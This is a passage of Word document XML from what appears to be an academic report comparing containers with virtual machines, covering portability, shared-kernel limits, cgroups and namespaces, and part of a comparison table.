        <w:t xml:space="preserve"> and packages on top of the host’s OS</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>and are</w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve"> therefore</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> easy</w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t xml:space="preserve"> and fast</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> to scale up, </w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve">providing much </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>flexib</w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve">ility </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> less performance overhead than hypervisor virtualisation in the native cloud environment. For these reasons</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t>, container</w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t xml:space="preserve"> or container-based virtualisation</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> becoming the ideal framework </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve">for creating </w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t>virtual machines</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> in the cloud ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="002D73C7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve"> In addition, containers </w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t>support great</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t xml:space="preserve"> portability </w:t>
      </w:r>
      <w:r w:rsidR="00065606">
        <w:t xml:space="preserve">for creating and deploying cloud-based applications while </w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t>maintaining</w:t>
      </w:r>
      <w:r w:rsidR="00065606">
        <w:t xml:space="preserve"> continuous integration (CI) and continuous delivery (CD</w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00457217" w:rsidRPr="002D73C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t xml:space="preserve"> development and deployment</w:t>
      </w:r>
      <w:r w:rsidR="00207C99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>to production environment</w:t>
      </w:r>
      <w:r w:rsidR="007143DE">
        <w:t xml:space="preserve"> on the cloud</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="179629941"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:instrText xml:space="preserve"> CITATION ABh21 \l 2057  \m GRa19</w:instrText>
          </w:r>
          <w:r w:rsidR="00A3296F">
            <w:instrText xml:space="preserve"> \m DSa20</w:instrText>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6, 7, 8]</w:t>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00065606">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD69C9" w14:textId="1E65206A" w:rsidR="00EA29BA" w:rsidRDefault="00EA29BA" w:rsidP="001C368B">
      <w:r>
        <w:t xml:space="preserve">However, containers </w:t>
      </w:r>
      <w:r w:rsidR="000A1102">
        <w:t xml:space="preserve">are not versatile </w:t>
      </w:r>
      <w:r w:rsidR="00B81CBA">
        <w:t>to run diverse OS</w:t>
      </w:r>
      <w:r w:rsidR="006060C7">
        <w:t xml:space="preserve"> comparing to hypervisors. </w:t>
      </w:r>
      <w:r w:rsidR="00D97681">
        <w:t>Because</w:t>
      </w:r>
      <w:r w:rsidR="006060C7">
        <w:t xml:space="preserve"> they are designed to use the same OS as the parent or host OS</w:t>
      </w:r>
      <w:r w:rsidR="00D97681">
        <w:t xml:space="preserve">, a container created on a windows host machine can only support windows applications. As such, containers are applicable to </w:t>
      </w:r>
      <w:r w:rsidR="00E93B4C">
        <w:t xml:space="preserve">run various </w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>ms</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve"> of application only on a single OS platform. Furthermore, containers are vulnerable to more attacks than hypervisors as all share the host’s resources, including memory, CPU, and kernel</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve"> directly. However, Linux-based containers use </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve">groups and namespace </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:lastRenderedPageBreak/>
        <w:t>Linux features to secure them. The namespace provides separation while the Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="00C719D9">
        <w:t xml:space="preserve"> manag</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00C719D9">
        <w:t xml:space="preserve"> the resources, such as memory, CPU, and network</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1206441161"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:instrText xml:space="preserve"> CITATION OBe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F946D2">
            <w:instrText xml:space="preserve"> \m MMo20</w:instrText>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9, 10]</w:t>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C719D9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00937603">
        <w:t xml:space="preserve"> Figure 2 illustrates the system architecture of containerisation and virtual machines (VMs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFBA4D" w14:textId="64F0257D" w:rsidR="00DE7581" w:rsidRDefault="00DE7581" w:rsidP="00DE7581">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F057914" wp14:editId="06B75871">
            <wp:extent cx="4347210" cy="2374900"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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347210" cy="2374900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB2664" w14:textId="2684909F" w:rsidR="00B933F3" w:rsidRDefault="00B933F3" w:rsidP="00B933F3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc86858593"/>
      <w:bookmarkStart w:id="36" w:name="_Toc86867483"/>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Virtual Machine (VM) Vs Containerisation architecture</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1765726815"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION OBe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="17234BC9" w14:textId="7F2BE7A0" w:rsidR="00B04351" w:rsidRDefault="009116A4" w:rsidP="00F36AB4">
      <w:r>
        <w:t>However, both VM and container-based virtualisation techniques are designed for different use cases using various methods. There are several differences between these them.</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> For example, containers do not support multiple kernels since they rely on the kernel to create virtualisation. Moreover, containers can boot up faster than VM. They also consume </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>less</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> resources compar</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> to VMs. However, they are less secure than VMs</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1818682271"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:instrText xml:space="preserve"> CITATION QZh18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B06579">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00810BF5">
        <w:t xml:space="preserve"> Table 1 summar</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>ises</w:t>
      </w:r>
      <w:r w:rsidR="00810BF5">
        <w:t xml:space="preserve"> the comparison between the VM and </w:t>
      </w:r>
      <w:r w:rsidR="00B04351">
        <w:t>containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231E0EA" w14:textId="25CDCDED" w:rsidR="00B04351" w:rsidRPr="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00C121FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc86858663"/>
      <w:bookmarkStart w:id="38" w:name="_Toc86867553"/>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: differences between containers and VM</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-218910822"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ANJ15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9209" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="3685"/>
        <w:gridCol w:w="3544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B04351" w14:paraId="46E71AF6" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692117C0" w14:textId="6E8E3C3C" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359915A4" w14:textId="39E5093E" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDFF5D7" w14:textId="7F921F78" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04351" w14:paraId="211D4B68" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23FF15CC" w14:textId="5997F4AC" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF3F55A" w14:textId="6963FAE1" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Less performance overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291837B1" w14:textId="0FC0E818" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>High performance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04351" w14:paraId="5F74B586" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190E6306" w14:textId="2AA08F2B" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F9A1F6" w14:textId="2BE72478" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Supports single kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC750D5" w14:textId="399BE5FF" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Multiple kernel’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="3772F5A4" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF4CE28" w14:textId="66D37F44" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9594E6" w14:textId="02B672CC" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Less isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617DF027" w14:textId="26A60742" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Provides high level of isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="748DF593" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503847D6" w14:textId="114D3400" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Booting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A28D022" w14:textId="188DD793" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC577B4" w14:textId="7EDAEEA3" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
